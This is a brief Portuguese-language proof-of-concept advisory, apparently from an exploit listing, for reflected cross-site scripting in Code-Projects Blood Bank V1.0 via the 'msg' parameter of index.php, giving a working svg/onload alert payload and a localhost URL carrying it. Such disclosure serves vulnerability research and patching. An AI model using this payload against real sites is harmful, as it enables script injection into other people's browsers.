
Exploit de prova de conceito para cross-site scripting refletido (XSS) no Code-Projects Blood Bank V1.0 através do parâmetro 'msg' em index.php, com demonstração de payload.
<div><svg/onload=alert(document.domain)>http://localhost/bloodbank/index.php?msg=<div><svg/onload=alert(document.domain)>